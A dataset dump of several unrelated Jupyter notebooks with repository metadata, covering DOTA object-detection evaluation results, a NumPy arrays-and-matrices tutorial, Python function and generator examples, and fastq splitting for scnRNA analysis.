classaps)\n\n\nif __name__ == '__main__':\n main()\n",
"_____no_output_____"
],
[
"!python /content/ReDet/DOTA_devkit/dota_evaluation_task1.py --work_dir /content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1",
"_____no_output_____"
],
[
"!python /content/ReDet/DOTA_devkit/dota_evaluation_task1.py --work_dir /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota",
"_____no_output_____"
],
[
"!python /content/ReDet/DOTA_devkit/dota_evaluation_task1.py --work_dir /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota",
"_____no_output_____"
]
],
[
[
"# لیست خروجی ولیدیشنها",
"_____no_output_____"
],
[
"**ReDet**\n\nmap: 0.8514600172670281\n\nclassaps: [90.74063962 88.35952404 70.27778167 83.69586216 71.37892832 88.03846396\n 88.83972303 90.90909091 89.87234694 90.00746689 90.00924415 82.27596327\n 88.32895278 80.09628041 84.35975774]",
"_____no_output_____"
],
[
"**faster_rcnn_RoITrans_r50_fpn_1x_dota**\n\nmap: 0.8416679746473459\n\nclassaps: [90.14526646 87.5615606 73.58691439 80.72462287 74.76489526 88.86002316\n 88.68232501 90.59249634 87.15753582 90.14873059 75.92481942 85.70194711\n 87.96535504 81.13566148 79.54980843]",
"_____no_output_____"
],
[
"**faster_rcnn_obb_r50_fpn_1x_dota**\n\nmap: 0.7869873566873331\n\nclassaps: [90.22626651 83.21467398 60.88286463 66.33192138 70.29939163 84.09063058\n 88.17042018 90.89576113 80.49975872 89.18961722 78.22831552 79.33052598\n 75.461711 71.27527659 72.38389998]",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
cb2b5dfc17a44d6dab64a704e24b316a298ee79f | 107,856 | ipynb | Jupyter Notebook | Tutorial_24_Integration.ipynb | Japhiolite/JuliaTutorial | 3222ce1b55361c43a25ea76bb01990d0723a9adf | [
"MIT"
] | 86 | 2017-05-03T06:12:57.000Z | 2022-03-25T19:55:15.000Z | Tutorial_24_Integration.ipynb | Japhiolite/JuliaTutorial | 3222ce1b55361c43a25ea76bb01990d0723a9adf | [
"MIT"
] | 2 | 2018-03-01T12:26:58.000Z | 2021-08-09T18:20:07.000Z | Tutorial_24_Integration.ipynb | Japhiolite/JuliaTutorial | 3222ce1b55361c43a25ea76bb01990d0723a9adf | [
"MIT"
] | 54 | 2017-05-03T06:12:58.000Z | 2021-10-15T07:49:55.000Z | 153.641026 | 17,104 | 0.674761 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
cb2b5f77dfd26e2561ce17ae48bcaa38992b183e | 22,370 | ipynb | Jupyter Notebook | part-1/Intro_to_NumPy.ipynb | masterflorin/dlnd-udacity | 53dc427a7337c4c232668225d35043e370a0d96a | [
"MIT"
] | 1 | 2020-01-19T17:26:36.000Z | 2020-01-19T17:26:36.000Z | part-1/Intro_to_NumPy.ipynb | masterflorin/dlnd-udacity | 53dc427a7337c4c232668225d35043e370a0d96a | [
"MIT"
] | null | null | null | part-1/Intro_to_NumPy.ipynb | masterflorin/dlnd-udacity | 53dc427a7337c4c232668225d35043e370a0d96a | [
"MIT"
] | 1 | 2020-01-19T17:27:09.000Z | 2020-01-19T17:27:09.000Z | 23.97642 | 549 | 0.495217 | [
[
[
"## Importing the library",
"_____no_output_____"
]
],
[
[
"import numpy as np",
"_____no_output_____"
]
],
[
[
"## Data Types",
"_____no_output_____"
],
[
"### Scalars",
"_____no_output_____"
]
],
[
[
"# creating a scalar, we use the 'array' in order to create any type of data type e.g. scalar, vector, matrix\ns = np.array(5)\n# visualizing the shape of a scalar, in the example below it returns an empty tuple which is normal\n# a scalar has zero-length which in numpy is represented as an empty tuple\nprint(s.shape) \n# we can do operations on a scalar e.g addition\nx = s + 3\nprint(x)",
"()\n8\n"
]
],
[
[
"### Vectors",
"_____no_output_____"
]
],
[
[
"# creating a vector. we have to pass a list as input\nv = np.array([1,2,3])\n# visualizing the shape, a 3-long row vector. This can also be stored as a column vector\nprint(v.shape)\n# access first element\nv[1]\n# access from second to last\nv[1:]",
"(3,)\n"
]
],
[
[
"### Matrices",
"_____no_output_____"
]
],
[
[
"# creating a matrix, with a list of lists as input\nm = np.array([[1,2,3], [4,5,6], [7,8,9]])\n# visualize shape, a 3 x 3 matrix\nm.shape\n# access from the second row, first two elements\nm[1,:2]\n# access elements from all rows from the third column\nm[:,-1]",
"_____no_output_____"
]
],
[
[
"### Tensors",
"_____no_output_____"
]
],
[
[
"# creating a 4-dimensional tensor\nt = np.array([[[[1],[2]],[[3],[4]],[[5],[6]]],[[[7],[8]],\\\n [[9],[10]],[[11],[12]]],[[[13],[14]],[[15],[16]],[[17],[17]]]])\n# visualize shape, this structure is going to be used a lot of times in PyTorch and other deep learning frameworks\nt.shape\n# access number 16, we have to pass through the dimensions by using multiple indices\n# in order to get to the value\nt[2][1][1][0]",
"_____no_output_____"
]
],
[
[
"### Changing shapes\nSometimes you'll need to change the shape of your data without actually changing its contents. For example, you may have a vector, which is one-dimensional, but need a matrix, which is two-dimensional.",
"_____no_output_____"
]
],
[
[
"# let's say we have a row vector\nv = np.array([1,2,3,4])\nv.shape",
"_____no_output_____"
],
[
"# what if we wanted a 1x4 matrix instead but without re-declaring the variable\nx = v.reshape(1,4) # specify the column size, then the row size\nprint(x)\nx.shape",
"[[1 2 3 4]]\n"
],
[
"# and we could change back to 4x1\nx = x.reshape(4,1)\nprint(x)\nx.shape",
"[[1]\n [2]\n [3]\n [4]]\n"
]
],
[
[
"#### Other way of changing shape\nFrom Udacity: Those lines create a slice that looks at all of the items of `v` but asks NumPy to add a new dimension of size 1 for the associated axis. It may look strange to you now, but it's a common technique so it's good to be aware of it. ",
"_____no_output_____"
]
],
[
[
"# other ways to reshape using slicing which is a very common practice when working with numpy arrays\n# this is essentially telling us slice the array, give me all the columns and put them under one column\nx = v[None, :]\nprint(x)\nx.shape",
"[[1 2 3 4]]\n"
],
[
"# give me all the rows and put them in one column\nx = v[:, None]\nprint(x)\nx.shape",
"[[1]\n [2]\n [3]\n [4]]\n"
]
],
[
[
"### Element-wise operations",
"_____no_output_____"
]
],
[
[
"# performing a scalar addition\nvalues = [1,2,3,4,5]\nvalues = np.array(values) + 5\nprint(values)",
"[ 6 7 8 9 10]\n"
],
[
"# scalar multiplication, you can either use operators or functions\nsome_values = [2,3,4,5]\nx = np.multiply(some_values, 5)\nprint(x)\ny = np.array(some_values) * 5\nprint(y)",
"[10 15 20 25]\n[10 15 20 25]\n"
],
[
"# set every element to 0 in a matrix\nm = np.array([1,27,98, 5])\nprint(m)\n# now every element in m is zero, no matter how many dimensions it has\nm *= 0\nprint(m)",
"[ 1 27 98 5]\n[0 0 0 0]\n"
]
],
[
[
"### Element-wise Matrix Operations\nThe **key** here is to remember that these operations work only with matrices of the same shape, \nif the shapes are different then we couldn't perform the addition as below",
"_____no_output_____"
]
],
[
[
"a = np.array([[1,3],[5,7]])\nb = np.array([[2,4],[6,8]])\na + b",
"_____no_output_____"
]
],
[
[
"### Matrix multiplication",
"_____no_output_____"
],
[
"### Important Reminders About Matrix Multiplication\n\n- The number of columns in the left matrix must equal the number of rows in the right matrix.\n- The answer matrix always has the same number of rows as the left matrix and the same number of columns as the right matrix.\n- Order matters. Multiplying A•B is not the same as multiplying B•A.\n- Data in the left matrix should be arranged as rows., while data in the right matrix should be arranged as columns.",
"_____no_output_____"
]
],
[
[
"m = np.array([[1,2,3],[4,5,6]])\nn = m * 0.25\n\nnp.multiply(m,n) # m * n",
"_____no_output_____"
]
],
[
[
"#### Matrix Product",
"_____no_output_____"
]
],
[
[
"# pay close attention to the shapes of the matrices\n# the column of the left matrix must have the same value as the row of the right matrix\na = np.array([[1,2,3,4],[5,6,7,8]])\nprint(a.shape)\nb = np.array([[1,2,3],[4,5,6],[7,8,9],[10,11,12]])\nprint(b.shape)\nc = np.matmul(a,b)\nprint(c)",
"(2, 4)\n(4, 3)\n[[ 70 80 90]\n [158 184 210]]\n"
]
],
[
[
"#### Dot Product\nIt turns out that the results of `dot` and `matmul` are the same if the matrices are two dimensional. However, if the dimensions differ then you should expect different results so it's best to check the documentation for [dot](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html) and [matmul](https://docs.scipy.org/doc/numpy/reference/generated/numpy.matmul.html#numpy.matmul).",
"_____no_output_____"
]
],
[
[
"a = np.array([[1,2],[3,4]])\n# two ways of calling dot product\nnp.dot(a,a)\na.dot(a)\nnp.matmul(a,a)",
"_____no_output_____"
]
],
[
[
"### Matrix Transpose\nIf the original matrix is not a square then transpose changes its shape, technically we are swapping\ne.g. 2x4 matrix to 4x2",
"_____no_output_____"
],
[
"#### Rule of thumb: you can transpose for matrix multiplication if the data in the original matrices was arranged in rows but doesn't always apply \nStop and really think what is in your matrices and which should interact with each other",
"_____no_output_____"
]
],
[
[
"m = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])\nprint(m)\nprint(m.shape)",
"[[ 1 2 3 4]\n [ 5 6 7 8]\n [ 9 10 11 12]]\n(3, 4)\n"
]
],
[
[
"NumPy does this without actually moving any data in memory - \nit simply changes the way it indexes the original matrix - so it’s quite efficient.",
"_____no_output_____"
]
],
[
[
"# let's do a transpose\nm.T",
"_____no_output_____"
],
[
"# be careful with modifying data\nm_t = m.T\nm_t[3][1] = 200\nm_t",
"_____no_output_____"
]
],
[
[
"Notice how it modified both the transpose and the original matrix, too! ",
"_____no_output_____"
]
],
[
[
"m",
"_____no_output_____"
]
],
[
[
"#### Real case example",
"_____no_output_____"
]
],
[
[
"# we have two matrices inputs and weights (essential concepts for Neural Networks)\ninputs = np.array([[-0.27, 0.45, 0.64, 0.31]])\nprint(inputs)\ninputs.shape",
"[[-0.27 0.45 0.64 0.31]]\n"
],
[
"weights = np.array([[0.02, 0.001, -0.03, 0.036], \\\n [0.04, -0.003, 0.025, 0.009], [0.012, -0.045, 0.28, -0.067]])\nprint(weights)\nweights.shape",
"[[ 0.02 0.001 -0.03 0.036]\n [ 0.04 -0.003 0.025 0.009]\n [ 0.012 -0.045 0.28 -0.067]]\n"
],
[
"# let's try to do a matrix multiplication\nnp.matmul(inputs, weights)",
"_____no_output_____"
]
],
[
[
"What happened was that our matrices were not compatible because the columns from our left matrix didn't equal the number of rows from the right matrix. So what do we do? We transpose but which one? That depends on what shape we want.",
"_____no_output_____"
]
],
[
[
"np.matmul(inputs, weights.T)",
"_____no_output_____"
],
[
"# in order for this to work we have to swap the order of our matrices\nnp.matmul(weights, inputs.T)",
"_____no_output_____"
]
],
[
[
"The two answers are transposes of each other, so which multiplication you use really just depends on the shape you want for the output.",
"_____no_output_____"
],
[
"### Numpy exercises",
"_____no_output_____"
]
],
[
[
"def prepare_inputs(inputs):\n # TODO: create a 2-dimensional ndarray from the given 1-dimensional list;\n # assign it to input_array\n input_array = np.array([inputs])\n \n # TODO: find the minimum value in input_array and subtract that\n # value from all the elements of input_array. Store the\n # result in inputs_minus_min\n inputs_minus_min = input_array - input_array.min()\n\n # TODO: find the maximum value in inputs_minus_min and divide\n # all of the values in inputs_minus_min by the maximum value.\n # Store the results in inputs_div_max.\n inputs_div_max = inputs_minus_min / inputs_minus_min.max()\n\n # return the three arrays we've created\n return input_array, inputs_minus_min, inputs_div_max\n \n\ndef multiply_inputs(m1, m2):\n # TODO: Check the shapes of the matrices m1 and m2. \n # m1 and m2 will be ndarray objects.\n #\n # Return False if the shapes cannot be used for matrix\n # multiplication. You may not use a transpose\n if m1.shape[0] != m2.shape[1] and m1.shape[1] != m2.shape[0]:\n return False\n # TODO: If you have not returned False, then calculate the matrix product\n # of m1 and m2 and return it. Do not use a transpose,\n # but you swap their order if necessary\n if m1.shape[1] == m2.shape[0]:\n return np.matmul(m1, m2) \n else:\n return np.matmul(m2, m1) \n \ndef find_mean(values):\n # TODO: Return the average of the values in the given Python list\n return np.mean(values)",
"_____no_output_____"
],
[
"input_array, inputs_minus_min, inputs_div_max = prepare_inputs([-1,2,7])\nprint(\"Input as Array: {}\".format(input_array))\nprint(\"Input minus min: {}\".format(inputs_minus_min))\nprint(\"Input Array: {}\".format(inputs_div_max))\n\nprint(\"Multiply 1:\\n{}\".format(multiply_inputs(np.array([[1,2,3],[4,5,6]]), np.array([[1],[2],[3],[4]]))))\nprint(\"Multiply 2:\\n{}\".format(multiply_inputs(np.array([[1,2,3],[4,5,6]]), np.array([[1],[2],[3]]))))\nprint(\"Multiply 3:\\n{}\".format(multiply_inputs(np.array([[1,2,3],[4,5,6]]), np.array([[1,2]]))))\n\nprint(\"Mean == {}\".format(find_mean([1,3,4])))",
"Input as Array: [[-1 2 7]]\nInput minus min: [[0 3 8]]\nInput Array: [[0. 0.375 1. ]]\nMultiply 1:\nFalse\nMultiply 2:\n[[14]\n [32]]\nMultiply 3:\n[[ 9 12 15]]\nMean == 2.6666666666666665\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
]
] |
cb2b64148c825db5cc3ad2e6106bd6c1d593c070 | 11,449 | ipynb | Jupyter Notebook | notebooks/Lyna/SplitFastqBySeqLength_WT_E_50Mill.ipynb | VCMason/PyGenToolbox | 3367a9b3df3bdb0223dd9671e9d355b81455fe2f | [
"MIT"
] | null | null | null | notebooks/Lyna/SplitFastqBySeqLength_WT_E_50Mill.ipynb | VCMason/PyGenToolbox | 3367a9b3df3bdb0223dd9671e9d355b81455fe2f | [
"MIT"
] | null | null | null | notebooks/Lyna/SplitFastqBySeqLength_WT_E_50Mill.ipynb | VCMason/PyGenToolbox | 3367a9b3df3bdb0223dd9671e9d355b81455fe2f | [
"MIT"
] | null | null | null | 36.695513 | 230 | 0.636912 | [
[
[
"%load_ext autoreload\n%autoreload 2\nimport datetime\nimport os\nprint(datetime.datetime.now())\n\nfrom pygentoolbox import SplitFastqFileBySeqLength\n# from pygentoolbox.Tools import read_interleaved_fasta_as_noninterleaved\n# from pygentoolbox.Tools import make_circos_karyotype_file\n#dir(pygentoolbox.Tools)\n%matplotlib inline\nimport matplotlib.pyplot as plt",
"The autoreload extension is already loaded. To reload it, use:\n %reload_ext autoreload\n2020-07-31 09:54:15.220646\n"
],
[
"# f is full path to fastq file\nf = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\hisat2\\\\Pt_51_MacAndIES\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES.fastq'\n#f = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\hisat2\\\\Pt_51_MacAndIES\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F260.sort.IESOnly.fastq'\n#f = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\pear\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE.fastq'\n\nSplitFastqFileBySeqLength.main(f)",
"On sequence: 0\nOn sequence: 100000\nOn sequence: 200000\nOn sequence: 300000\nOn sequence: 400000\nOn sequence: 500000\nOn sequence: 600000\nOn sequence: 700000\nOn sequence: 800000\nOn sequence: 900000\nOn sequence: 1000000\nOn sequence: 1100000\nOn sequence: 1200000\nMade one fastq file for each sequence length:\nInput file: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES.fastq\nExample output filename: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES92bp.fastq\nNumber of lines in input file: 5076872\n"
],
[
"%load_ext autoreload\n%autoreload 2\nimport datetime\nimport os\nprint(datetime.datetime.now())\n\nfrom pygentoolbox import FindScanRNAInFastq\n# from pygentoolbox.Tools import read_interleaved_fasta_as_noninterleaved\n# from pygentoolbox.Tools import make_circos_karyotype_file\n#dir(pygentoolbox.Tools)\n%matplotlib inline\nimport matplotlib.pyplot as plt",
"The autoreload extension is already loaded. To reload it, use:\n %reload_ext autoreload\n2020-07-31 10:06:24.707129\n"
],
[
"# f is full path to fastq file\nf = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\hisat2\\\\Pt_51_MacAndIES\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES25bp.fastq'\n#f = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\pear\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE25bp.fastq'\n\n# currently script assumes UNG signature is at the 5' end of the read\nFindScanRNAInFastq.main(f)\n\nf = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\hisat2\\\\Pt_51_MacAndIES\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES150bp.fastq'\n#f = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\pear\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE25bp.fastq'\n\n# currently script assumes UNG signature is at the 5' end of the read\nFindScanRNAInFastq.main(f)",
"On sequence: 0\nMade one fastq file for each sequence length:\nInput file: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES25bp.fastq\nExample output filename: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES25bp.scnRNA.fastq\nNumber of sequences in input file: 2509\nNumber of sequences in output file: 164\nOn sequence: 0\nMade one fastq file for each sequence length:\nInput file: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES150bp.fastq\nExample output filename: No scnRNA found\nNumber of sequences in input file: 5157\nNumber of sequences in output file: 0\n"
],
[
"# f is full path to fastq file\nf = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\hisat2\\\\Pt_51_MacAndIES\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F260.sort.IESOnly26bp.fastq'\n#f = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\pear\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE25bp.fastq'\n\n# currently script assumes UNG signature is at the 5' end of the read\nFindScanRNAInFastq.main(f)",
"On sequence: 0\nMade one fastq file for each sequence length:\nInput file: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F260.sort.IESOnly26bp.fastq\nExample output filename: No scnRNA found\nNumber of sequences in input file: 37\nNumber of sequences in output file: 0\n"
],
[
"%load_ext autoreload\n%autoreload 2\nimport datetime\nimport os\nprint(datetime.datetime.now())\n\nfrom pygentoolbox import SplitFastqFileBySeqLength\n# from pygentoolbox.Tools import read_interleaved_fasta_as_noninterleaved\n# from pygentoolbox.Tools import make_circos_karyotype_file\n#dir(pygentoolbox.Tools)\n%matplotlib inline\nimport matplotlib.pyplot as plt",
"The autoreload extension is already loaded. To reload it, use:\n %reload_ext autoreload\n2020-07-31 08:16:07.285598\n"
],
[
"# f is full path to fastq file\nf = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\hisat2\\\\Pt_51_MacAndIES\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.IESOnly.fastq'\n#f = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\pear\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE.fastq'\n\nSplitFastqFileBySeqLength.main(f)",
"On sequence: 0\nOn sequence: 100000\nOn sequence: 200000\nOn sequence: 300000\nMade one fastq file for each sequence length:\nInput file: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.IESOnly.fastq\nExample output filename: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.IESOnly100bp.fastq\nNumber of lines in input file: 1257876\n"
],
[
"%load_ext autoreload\n%autoreload 2\nimport datetime\nimport os\nprint(datetime.datetime.now())\n\nfrom pygentoolbox import FindScanRNAInFastq\n# from pygentoolbox.Tools import read_interleaved_fasta_as_noninterleaved\n# from pygentoolbox.Tools import make_circos_karyotype_file\n#dir(pygentoolbox.Tools)\n%matplotlib inline\nimport matplotlib.pyplot as plt",
"The autoreload extension is already loaded. To reload it, use:\n %reload_ext autoreload\n2020-07-31 08:18:07.672019\n"
],
[
"# f is full path to fastq file\nf = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\hisat2\\\\Pt_51_MacAndIES\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.IESOnly25bp.fastq'\n#f = 'D:\\\\LinuxShare\\\\Projects\\\\Lyna\\\\CharSeqPipe\\\\EV_E_50MilReads\\\\pear\\\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE25bp.fastq'\n\n# currently script assumes UNG signature is at the 5' end of the read\nFindScanRNAInFastq.main(f)",
"On sequence: 0\nMade one fastq file for each sequence length:\nInput file: D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.IESOnly25bp.fastq\nExample output filename: No scnRNA found\nNumber of sequences in input file: 39\nNumber of sequences in output file: 0\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2b65c8ab058d5d78823e8163056dd5e434d610 | 10,839 | ipynb | Jupyter Notebook | src/notebooks/function.ipynb | hackerphysics/beginning-python | 7f4927fc9e40e6ac10fcb4478e87550378671bc2 | [
"MIT"
] | null | null | null | src/notebooks/function.ipynb | hackerphysics/beginning-python | 7f4927fc9e40e6ac10fcb4478e87550378671bc2 | [
"MIT"
] | null | null | null | src/notebooks/function.ipynb | hackerphysics/beginning-python | 7f4927fc9e40e6ac10fcb4478e87550378671bc2 | [
"MIT"
] | null | null | null | 22.348454 | 889 | 0.443952 | [
[
[
"a = 1\ndir(1)",
"_____no_output_____"
],
[
"a.__name__",
"_____no_output_____"
],
[
"import types\nclass f(types.FunctionType):\n def __add__():\n return 1024",
"_____no_output_____"
],
[
"def foo(x):\n return x, 2*x, 3*x",
"_____no_output_____"
],
[
"\nb = foo(1)\nx,y,z = foo(1)\nx",
"_____no_output_____"
],
[
"def fib(n):\n if n < 1:\n return None\n if n == 1:\n return 1\n elif n == 2:\n return 1\n else:\n return fib(n-1) + fib(n-2)\n\nprint(fib(10))",
"55\n"
],
[
"sum = lambda x,y: x+y\nsum(1,2)",
"_____no_output_____"
],
[
"import math\nsin2 = lambda x: math.sin(x)**2\nsin2(math.pi/2)",
"_____no_output_____"
],
[
"import math\nfuncs = [math.sin, math.cos, math.tan]\n[print(f(0.5)) for f in funcs]",
"0.479425538604203\n0.8775825618903728\n0.5463024898437905\n"
],
[
"def abs_f(fun, x):\n return abs(fun(x))\n \nabs_f(math.sin, -0.5)",
"_____no_output_____"
],
[
"def add_N(n:int):\n def add(x):\n return x + n\n return add\n\nadd_1 = add_N(1)\nadd_1(1) # 2\nadd_1(3) # 4\n\nadd_1024 = add_N(1024)\nadd_1024(3) # 1027",
"_____no_output_____"
],
[
"names = [\"zhang\",\"wang\",\"li\", \"zhao\"]\n\nsorted(names) # ['li', 'wang', 'zhang', 'zhao']\nsorted(names, key=len) # ['li', 'wang', 'zhao', 'zhang']\nsorted(names, key=lambda x: -len(x)) #['zhang', 'wang', 'zhao', 'li']",
"_____no_output_____"
],
[
"names = [\"zhang\",\"wang\",\"li\", \"zhao\"]\nlist(map(lambda x: x + \"#\", names))",
"_____no_output_____"
],
[
"def get_array():\n l = [1,2,3,4]\n return l\n\nfor x in get_array():\n print(x)\n\ndef get_array():\n l = [1,2,3,4]\n for x in l:\n yield x\n \nfor x in get_array():\n print(x)",
"1\n2\n3\n4\n1\n2\n3\n4\n"
],
[
"def get_array():\n arr = [0,1,2,3,4,5,6,7,8,9]\n return arr # 一次返回所有元素\n\nfor x in get_array():\n print(x)\n\ndef get_array():\n n = 0\n while n < 10:\n yield n\n n+=1\n\nfor x in get_array():\n print(x)\n",
"0\n1\n2\n3\n4\n5\n6\n7\n8\n9\n0\n1\n2\n3\n4\n5\n6\n7\n8\n9\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2b756e56cdb5bb46090ed67d5c7c983ca9929e | 28,305 | ipynb | Jupyter Notebook | plumbing/analysis.ipynb | saloni15495/pro_vis | bd223177b308cc525afdf63a5f0fc36a30e4f7b1 | [
"MIT"
] | 1 | 2021-12-06T11:35:07.000Z | 2021-12-06T11:35:07.000Z | plumbing/analysis.ipynb | saloni15495/pro_vis | bd223177b308cc525afdf63a5f0fc36a30e4f7b1 | [
"MIT"
] | 2 | 2018-10-26T20:17:59.000Z | 2019-01-02T06:40:37.000Z | plumbing/analysis.ipynb | matheushjs/ElfPSP_ParallelABC | 0692adb2a32f1d5780c462a2b4902e311f62e627 | [
"MIT"
] | 2 | 2021-12-05T09:57:59.000Z | 2022-01-23T09:20:54.000Z | 362.884615 | 26,356 | 0.931037 | [
[
[
